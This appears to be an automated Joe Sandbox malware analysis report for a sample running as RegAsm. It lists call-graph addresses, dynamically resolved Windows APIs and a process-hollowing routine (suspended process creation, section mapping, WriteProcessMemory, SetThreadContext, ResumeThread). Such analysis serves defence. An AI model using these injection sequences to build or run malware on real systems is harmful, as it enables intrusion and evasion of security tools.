55082->55062 55082->55063 55082->55070 55083->55070 55084->55052 55085->55070 55086->55079 55088 41cc20 LoadLibraryA GetProcAddress 55087->55088 55089 41cc10 GetModuleHandleA GetProcAddress 55087->55089 55090 41cc49 44 API calls 55088->55090 55091 41cc39 LoadLibraryA GetProcAddress 55088->55091 55089->55088 55090->54611 55091->55090 55396 41b539 FindResourceA 55092->55396 55095 43bda0 new 21 API calls 55096 40f428 _Yarn 55095->55096 55097 4020b7 28 API calls 55096->55097 55098 40f443 55097->55098 55099 401fe2 28 API calls 55098->55099 55100 40f44e 55099->55100 55101 401fd8 11 API calls 55100->55101 55102 40f457 55101->55102 55103 43bda0 new 21 API calls 55102->55103 55104 40f468 _Yarn 55103->55104 55399 406e13 55104->55399 55106 40f49b 55106->54613 55108 40fb5e 55107->55108 55110 40fb65 55107->55110 55402 402163 11 API calls 55108->55402 55110->54621 55403 401fab 55111->55403 55292->54628 55293->54637 55294->54641 55297 4020df 11 API calls 55296->55297 55298 406c65 55297->55298 55299 4032a0 28 API calls 55298->55299 55300 406c82 55299->55300 55300->54662 55302 40ebdf 55301->55302 55303 4135ae RegQueryValueExA RegCloseKey 55301->55303 55302->54659 55302->54676 55303->55302 55304->54667 55394->54686 55397 41b556 LoadResource LockResource SizeofResource 55396->55397 55398 40f419 55396->55398 55397->55398 55398->55095 55400 4020b7 28 API calls 55399->55400 55401 406e27 55400->55401 55401->55106 55402->55110 55862 4129da 55863 4129ec 55862->55863 55864 4041a2 28 API calls 55863->55864 55865 4129ff 55864->55865 55866 4020f6 28 API calls 55865->55866 55867 412a0e 55866->55867 55868 4020f6 28 API calls 55867->55868 55869 412a1d 55868->55869 55870 41beac 28 API calls 55869->55870 55871 412a26 55870->55871 55872 412ace 55871->55872 55874 401e65 22 API calls 55871->55874 55873 401e8d 11 API calls 55872->55873 55875 412ad7 55873->55875 55876 412a3d 55874->55876 55877 401fd8 11 API calls 55875->55877 55878 4020f6 28 API calls 55876->55878 55879 412ae0 55877->55879 55880 412a48 55878->55880 55881 401fd8 11 API calls 55879->55881 55882 401e65 22 API calls 55880->55882 55883 412ae8 55881->55883 55884 412a53 55882->55884 55885 4020f6 28 API calls 55884->55885 55886 412a5e 55885->55886 55887 401e65 22 API calls 55886->55887 55888 412a69 55887->55888 55889 4020f6 28 API calls 55888->55889 55890 412a74 55889->55890 55891 401e65 22 API calls 55890->55891 55892 412a7f 55891->55892 55893 4020f6 28 API calls 55892->55893 55894 412a8a 55893->55894 55895 401e65 22 API calls 55894->55895 55896 412a95 55895->55896 55897 4020f6 28 API calls 55896->55897 55898 412aa0 55897->55898 55899 401e65 22 API calls 55898->55899 55900 412aae 55899->55900 55901 4020f6 28 API calls 55900->55901 55902 412ab9 55901->55902 55906 412aef GetModuleFileNameW 55902->55906 55905 404e26 99 API calls 55905->55872 55907 4020df 11 API calls 55906->55907 55908 412b1a 55907->55908 55909 4020df 11 API calls 55908->55909 55910 412b26 55909->55910 55911 4020df 11 API calls 55910->55911 55933 412b32 55911->55933 55912 40da23 32 API calls 55912->55933 55913 401fd8 11 API calls 55913->55933 55914 41ba09 43 API calls 55914->55933 55915 4185a3 31 API calls 55915->55933 55916 412c58 Sleep 55916->55933 55917 40417e 28 API calls 55917->55933 55918 4042fc 84 API calls 55918->55933 55919 40431d 28 API calls 55919->55933 55920 401f09 11 API calls 55920->55933 55921 412cfa Sleep 55921->55933 55922 403014 28 API calls 55922->55933 55923 412d9c Sleep 55923->55933 55924 41c516 32 API calls 55924->55933 55925 412dff DeleteFileW 55925->55933 55926 412e36 DeleteFileW 55926->55933 55927 412e88 Sleep 55927->55933 55928 412e72 DeleteFileW 55928->55933 55929 412f01 55930 401f09 11 API calls 55929->55930 55931 412f0d 55930->55931 55932 401f09 11 API calls 55931->55932 55934 412f19 55932->55934 55933->55912 55933->55913 55933->55914 55933->55915 55933->55916 55933->55917 55933->55918 55933->55919 55933->55920 55933->55921 55933->55922 55933->55923 55933->55924 55933->55925 55933->55926 55933->55927 55933->55928 55933->55929 55937 412ecd Sleep 55933->55937 55935 401f09 11 API calls 55934->55935 55936 412f25 55935->55936 55938 40b93f 28 API calls 55936->55938 55939 401f09 11 API calls 55937->55939 55940 412f38 55938->55940 55944 412edd 55939->55944 55942 4020f6 28 API calls 55940->55942 55941 401f09 11 API calls 55941->55944 55943 412f58 55942->55943 56053 413268 55943->56053 55944->55933 55944->55941 55945 412eff 55944->55945 55945->55936 55948 401f09 11 API calls 55949 412f6f 55948->55949 55950 4130e3 55949->55950 55951 412f8f 55949->55951 55952 41bdaf 28 API calls 55950->55952 55953 41bdaf 28 API calls 55951->55953 55954 4130ec 55952->55954 55955 412f9b 55953->55955 55956 402f31 28 API calls 55954->55956 55957 41bc1f 28 API calls 55955->55957 55958 413123 55956->55958 55959 412fb5 55957->55959 55960 402f10 28 API calls 55958->55960 55961 402f31 28 API calls 55959->55961 55962 413132 55960->55962 55963 412fe5 55961->55963 55964 402f10 28 API calls 55962->55964 55965 402f10 28 API calls 55963->55965 55966 41313e 55964->55966 55967 412ff4 55965->55967 55968 402f10 28 API calls 55966->55968 55969 402f10 28 API calls 55967->55969 55970 41314d 55968->55970 55971 413003 55969->55971 55972 402f10 28 API calls 55970->55972 55973 402f10 28 API calls 55971->55973 55975 41315c 55972->55975 55974 413012 55973->55974 55977 402f10 28 API calls 55974->55977 55976 402f10 28 API calls 55975->55976 55978 41316b 55976->55978 55979 413021 55977->55979 55980 402f10 28 API calls 55978->55980 55981 402f10 28 API calls 55979->55981 55982 41317a 55980->55982 55983 41302d 55981->55983 55984 402ea1 28 API calls 55982->55984 55985 402f10 28 API calls 55983->55985 55986 413184 55984->55986 55987 413039 55985->55987 55988 404aa1 61 API calls 55986->55988 55989 402ea1 28 API calls 55987->55989 55990 413191 55988->55990 55991 413048 55989->55991 55992 401fd8 11 API calls 55990->55992 55993 402f10 28 API calls 55991->55993 55994 41319d 55992->55994 55995 413054 55993->55995 55996 401fd8 11 API calls 55994->55996 55997 402ea1 28 API calls 55995->55997 55998 4131a9 55996->55998 55999 41305e 55997->55999 56000 401fd8 11 API calls 55998->56000 56001 404aa1 61 API calls 55999->56001 56002 4131b5 56000->56002 56003 41306b 56001->56003 56004 401fd8 11 API calls 56002->56004 56005 401fd8 11 API calls 56003->56005 56007 4131c1 56004->56007 56006 413074 56005->56006 56009 401fd8 11 API calls 56006->56009 56008 401fd8 11 API calls 56007->56008 56010 4131ca 56008->56010 56011 41307d 56009->56011 56012 401fd8 11 API calls 56010->56012 56013 401fd8 11 API calls 56011->56013 56014 4131d3 56012->56014 56015 413086 56013->56015 56016 401fd8 11 API calls 56014->56016 56017 401fd8 11 API calls 56015->56017 56018 4130d7 56016->56018 56019 41308f 56017->56019 56021 401fd8 11 API calls 56018->56021 56020 401fd8 11 API calls 56019->56020 56022 41309b 56020->56022 56023 4131e5 56021->56023 56024 401fd8 11 API calls 56022->56024 56025 401f09 11 API calls 56023->56025 56026 4130a7 56024->56026 56027 4131f1 56025->56027 56028 401fd8 11 API calls 56026->56028 56029 401fd8 11 API calls 56027->56029 56030 4130b3 56028->56030 56031 4131fd 56029->56031 56032 401fd8 11 API calls 56030->56032 56033 401fd8 11 API calls 56031->56033 56034 4130bf 56032->56034 56035 413209 56033->56035 56036 401fd8 11 API calls 56034->56036 56038 401fd8 11 API calls 56035->56038 56037 4130cb 56036->56037 56040 401fd8 11 API calls 56037->56040 56039 413215 56038->56039 56041 401fd8 11 API calls 56039->56041 56040->56018 56042 413221 56041->56042 56043 401fd8 11 API calls 56042->56043 56044 41322d 56043->56044 56045 401fd8 11 API calls 56044->56045 56046 413239 56045->56046 56047 401fd8 11 API calls 56046->56047 56048 413245 56047->56048 56049 401fd8 11 API calls 56048->56049 56050 413251 56049->56050 56051 401fd8 11 API calls 56050->56051 56052 412abe 56051->56052 56052->55905 56054 4132a6 56053->56054 56056 413277 56053->56056 56055 4132b5 56054->56055 56065 10001c5b 56054->56065 56057 40417e 28 API calls 56055->56057 56069 411d2d 56056->56069 56059 4132c1 56057->56059 56061 401fd8 11 API calls 56059->56061 56063 412f63 56061->56063 56063->55948 56066 10001c6b ___scrt_fastfail 56065->56066 56073 100012ee 56066->56073 56068 10001c87 56068->56055 56115 411d39 56069->56115 56072 411fa2 22 API calls new 56072->56054 56074 10001324 ___scrt_fastfail 56073->56074 56075 100013b7 GetEnvironmentVariableW 56074->56075 56099 100010f1 56075->56099 56078 100010f1 51 API calls 56079 10001465 56078->56079 56080 100010f1 51 API calls 56079->56080 56081 10001479 56080->56081 56082 100010f1 51 API calls 56081->56082 56083 1000148d 56082->56083 56084 100010f1 51 API calls 56083->56084 56085 100014a1 56084->56085 56086 100010f1 51 API calls 56085->56086 56087 100014b5 lstrlenW 56086->56087 56088 100014d9 lstrlenW 56087->56088 56098 100014d2 56087->56098 56089 100010f1 51 API calls 56088->56089 56090 10001501 lstrlenW lstrcatW 56089->56090 56091 100010f1 51 API calls 56090->56091 56092 10001539 lstrlenW lstrcatW 56091->56092 56093 100010f1 51 API calls 56092->56093 56094 1000156b lstrlenW lstrcatW 56093->56094 56095 100010f1 51 API calls 56094->56095 56096 1000159d lstrlenW lstrcatW 56095->56096 56097 100010f1 51 API calls 56096->56097 56097->56098 56098->56068 56100 10001118 ___scrt_fastfail 56099->56100 56101 10001129 lstrlenW 56100->56101 56112 10002c40 56101->56112 56103 10001148 lstrcatW lstrlenW 56104 10001177 lstrlenW FindFirstFileW 56103->56104 56105 10001168 lstrlenW 56103->56105 56106 100011a0 56104->56106 56107 100011e1 56104->56107 56105->56104 56108 100011c7 FindNextFileW 56106->56108 56109 100011aa 56106->56109 56107->56078 56108->56106 56111 100011da FindClose 56108->56111 56109->56108 56114 10001000 51 API calls ___scrt_fastfail 56109->56114 56111->56107 56113 10002c57 56112->56113 56113->56103 56113->56113 56114->56109 56150 4117d7 56115->56150 56117 411d57 56118 411d6d SetLastError 56117->56118 56119 4117d7 SetLastError 56117->56119 56146 411d35 56117->56146 56118->56146 56120 411d8a 56119->56120 56120->56118 56122 411dac GetNativeSystemInfo 56120->56122 56120->56146 56123 411df2 56122->56123 56134 411dff SetLastError 56123->56134 56153 411cde VirtualAlloc 56123->56153 56126 411e22 56127 411e47 GetProcessHeap HeapAlloc 56126->56127 56179 411cde VirtualAlloc 56126->56179 56128 411e70 56127->56128 56129 411e5e 56127->56129 56132 4117d7 SetLastError 56128->56132 56180 411cf5 VirtualFree 56129->56180 56135 411eb9 56132->56135 56133 411e3a 56133->56127 56133->56134 56134->56146 56136 411f6b 56135->56136 56154 411cde VirtualAlloc 56135->56154 56181 4120b2 GetProcessHeap HeapFree 56136->56181 56139 411ed2 _Yarn 56155 4117ea 56139->56155 56141 411efe 56141->56136 56159 411b9a 56141->56159 56145 411f36 56145->56136 56145->56146 56175 1000220c 56145->56175 56146->56072 56147 411f5c 56147->56146 56148 411f60 SetLastError 56147->56148 56148->56136 56151 4117e6 56150->56151 56152 4117db SetLastError 56150->56152 56151->56117 56152->56117 56153->56126 56154->56139 56156 4118c0 56155->56156 56158 411816 _Yarn ___scrt_fastfail 56155->56158 56156->56141 56157 4117d7 SetLastError 56157->56158 56158->56156 56158->56157 56160 411bbb IsBadReadPtr 56159->56160 56167 411ca5 56159->56167 56163 411bd5 56160->56163 56160->56167 56164 411cbd SetLastError 56163->56164 56165 411ca7 SetLastError 56163->56165 56166 411c8a IsBadReadPtr 56163->56166 56163->56167 56182 440f5d 56163->56182 56164->56167 56165->56167 56166->56163 56166->56167 56167->56136 56169 41198a 56167->56169 56173 4119b0 56169->56173 56170 411a99 56171 4118ed VirtualProtect 56170->56171 56172 411aab 56171->56172 56172->56145 56173->56170 56173->56172 56197 4118ed 56173->56197 56176 10002215 56175->56176 56177 1000221a dllmain_dispatch 56175->56177 56201 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 56176->56201 56177->56147 56179->56133 56180->56134 56181->56146 56183 446206 56182->56183 56184 446213 56183->56184 56185 44621e 56183->56185 56186 4461b8 ___crtLCMapStringA 21 API calls 56184->56186 56187 446226 56185->56187 56193 44622f __Getctype 56185->56193 56191 44621b 56186->56191 56188 446802 _free 20 API calls 56187->56188 56188->56191 56189 446234 56195 44062d 20 API calls _abort 56189->56195 56190 446259 RtlReAllocateHeap 56190->56191 56190->56193 56191->56163 56193->56189 56193->56190 56196 443001 7 API calls 2 library calls 56193->56196 56195->56191 56196->56193 56198 4118fe 56197->56198 56200 4118f6 56197->56200 56199 411971 VirtualProtect 56198->56199 56198->56200 56199->56200 56200->56173 56201->56177 56202 42f97e 56203 42f989 56202->56203 56204 42f99d 56203->56204 56206 432f7f 56203->56206 56207 432f8a 56206->56207 56208 432f8e 56206->56208 56207->56204 56209 440f5d 22 API calls 56208->56209 56209->56207 56210 426cdc 56215 426d59 send 56210->56215 56216 40165e 56217 401666 56216->56217 56219 401669 56216->56219 56218 4016a8 56220 43455e new 22 API calls 56218->56220 56219->56218 56221 401696 56219->56221 56222 40169c 56220->56222 56223 43455e new 22 API calls 56221->56223 56223->56222 56224 10001f3f 56225 10001f4b ___DestructExceptionObject 56224->56225 56242 1000247c 56225->56242 56227 10001f52 56228 10002041 56227->56228 56229 10001f7c 56227->56229 56235 10001f57 ___scrt_is_nonwritable_in_current_image 56227->56235 56258 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 56228->56258 56253 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 56229->56253 56232 10002048 56233 10001f8b __RTC_Initialize 56233->56235 56254 100022fc RtlInitializeSListHead 56233->56254 56236 10001f99 ___scrt_initialize_default_local_stdio_options 56255 100046c5 5 API calls _ValidateLocalCookies 56236->56255 56238 10001fad 56238->56235 56256 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 56238->56256 56240 10001fb8 56240->56235 56257 10004669 5 API calls _ValidateLocalCookies 56240->56257 56243 10002485 56242->56243 56259 10002933 IsProcessorFeaturePresent 56243->56259 56245 10002491 56260 100034ea 56245->56260 56247 10002496 56248 1000249a 56247->56248 56269 100053c8 56247->56269 56248->56227 56251 100024b1 56251->56227 56253->56233 56254->56236 56255->56238 56256->56240 56257->56235 56258->56232 56259->56245 56261 100034ef ___vcrt_initialize_winapi_thunks 56260->56261 56273 10003936 6 API calls 2 library calls 56261->56273 56263 100034f9 56264 100034fd 56263->56264 56274 100038e8 56263->56274 56264->56247 56266 10003505 56267 10003510 56266->56267 56282 10003972 RtlDeleteCriticalSection 56266->56282 56267->56247 56301 10007457 56269->56301 56272 10003529 7 API calls 3 library calls 56272->56248 56273->56263 56283 10003af1 56274->56283 56278 1000390b 56279 10003918 56278->56279 56289 1000391b 5 API calls ___vcrt_FlsFree 56278->56289 56279->56266 56281 100038fd 56281->56266 56282->56264 56290 10003a82 56283->56290 56285 10003b0b 56286 10003b24 TlsAlloc 56285->56286 56287 100038f2 56285->56287 56287->56281 56288 10003ba2 5 API calls try_get_function 56287->56288 56288->56278 56289->56281 56291 10003aaa 56290->56291 56293 10003aa6 __crt_fast_encode_pointer 56290->56293 56291->56293 56294 100039be 56291->56294 56293->56285 56296 100039cd try_get_first_available_module 56294->56296 56295 100039ea LoadLibraryExW 56295->56296 56297 10003a05 GetLastError 56295->56297 56296->56295 56298 10003a60 FreeLibrary 56296->56298 56299 10003a77 56296->56299 56300 10003a38 LoadLibraryExW 56296->56300 56297->56296 56298->56296 56299->56293 56300->56296 56304 10007470 56301->56304 56302 10002ada _ValidateLocalCookies 5 API calls 56303 100024a3 56302->56303 56303->56251 56303->56272 56304->56302 56305 10005bff 56313 10005d5c 56305->56313 56307 10005c13 56310 10005c1b 56311 10005c28 56310->56311 56321 10005c2b 10 API calls 56310->56321 56314 10005c45 _abort 4 API calls 56313->56314 56315 10005d83 56314->56315 56316 10005d9b TlsAlloc 56315->56316 56317 10005d8c 56315->56317 56316->56317 56318 10002ada _ValidateLocalCookies 5 API calls 56317->56318 56319 10005c09 56318->56319 56319->56307 56320 10005b7a 19 API calls 2 library calls 56319->56320 56320->56310 56321->56307

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                  • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                  • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                  • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                  • API String ID: 4236061018-3687161714
                                                                                                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                                                                                  Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                  • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                                                                                  • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                  • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                  • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                  • API String ID: 316982871-3035715614
                                                                                                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
